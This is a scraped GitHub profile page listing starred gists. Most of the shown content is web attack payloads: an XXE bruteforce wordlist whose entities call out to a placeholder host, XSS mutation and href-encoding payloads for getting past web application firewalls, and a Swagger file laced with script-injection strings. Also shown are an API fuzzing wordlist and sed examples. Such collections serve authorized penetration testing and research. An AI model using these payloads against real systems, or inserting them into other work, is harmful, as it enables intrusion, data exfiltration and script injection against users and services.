Skip to content

Instantly share code, notes, and snippets.

View mrrootsec's full-sized avatar
🐈
Meowing

MOHAMMAD SAQLAIN mrrootsec

🐈
Meowing
24 followers · 59 following
View GitHub Profile
@thevillagehacker
thevillagehacker / Android-pentest.md
Last active February 8, 2025 04:11
Android Penetration Testing Resources
@honoki
honoki / xxe-payloads.txt
Last active April 19, 2026 17:51
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@hackerscrolls
hackerscrolls / mutation_a.txt
Last active April 8, 2026 18:54
Mutation points in <a> tag for WAF bypass
<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">
[1]
Bytes:
\x09 \x0a \x0c \x0d \x20 \x2f
<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">
[2,3]
@hackerscrolls
hackerscrolls / href_bypass.html
Last active December 16, 2025 16:46
XSS payloads for href
<!--javascript -->
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()
<!--::colon:: -->
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)
@yassineaboukir
yassineaboukir / List of API endpoints & objects
Last active April 17, 2026 23:58
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
@shockey
shockey / ponelat-evil-xss.swagger.json
Created May 4, 2018 17:05
{
"swagger" : "2.0",
"info" : {
"version" : "1.0.100",
"title" : "title<script language=\"javascript\">alert('1')</script>",
"description" : "description with **markdown** format <script language=\"javascript\">alert('script-in-description')</script> <img src=x onerror=alert(\"img-in-description\")>"
},
"tags" : [ {
"name" : "Admin",
"description" : "tag with **markdown**"
@r2k0
r2k0 / sed_snippets.sh
Last active April 4, 2025 13:35
sed examples
##FILE SPACING:
# double space a file
sed G
# double space a file which already has blank lines in it. Output file
# should contain no more than one blank line between lines of text.
sed '/^$/d;G'
# triple space a file